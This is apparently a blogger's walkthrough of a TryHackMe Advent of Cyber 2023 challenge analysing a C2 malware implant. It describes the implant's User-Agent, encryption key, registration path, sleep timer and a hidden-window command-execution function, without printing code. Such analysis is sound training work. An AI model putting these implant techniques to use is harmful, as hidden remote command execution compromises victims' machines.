Room: Advent of Cyber 2023 Day 9

C&C or C2, reffers to command and control servers. This is a server that acts like a proxy between a hacker and it’s victim.

Anonymity, command execution, data exfiltration and botnet coordination are just a few examples where a C2 server can play a crucual roll.

Using it for mind control however is something entirely new to me, but fun nonetheless.

The User-Agent request header is a characteristic string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.

We can find the User-Agent in the “GetIt” Function.

Again reffering to Mozilla documentation, where you can find all possible HTTP requests. Get and Post are used most often.

The “CreateEncryptor” method uses the variable “bytes” as the encryption key. The answer to Task 3 is the string that gets encoded when creating the variable “bytes”.

In the main function we can find the first HTTP URL. Which gets concatenated with “/reg”

I made a typo, but TryHackMe still decided the answer was ok. 🤓

The .Sleeper function takes “count” as an argument. Which is set a few lines above.

As the hint suggests, the answer has to be in seconds. Not milliseconds

If the command is shell, we drop into the part of the code that does the ExecuteCommand function.

The ExecuteCommand function is what the attacker uses to execute commands on the device of the victim.

Note that the ProcessWindowStyle is “Hidden”, so the victim will not notice that commands are being executed.

We can find the answer to Task 7 in the Implant method in the main function.

Happy Hacking!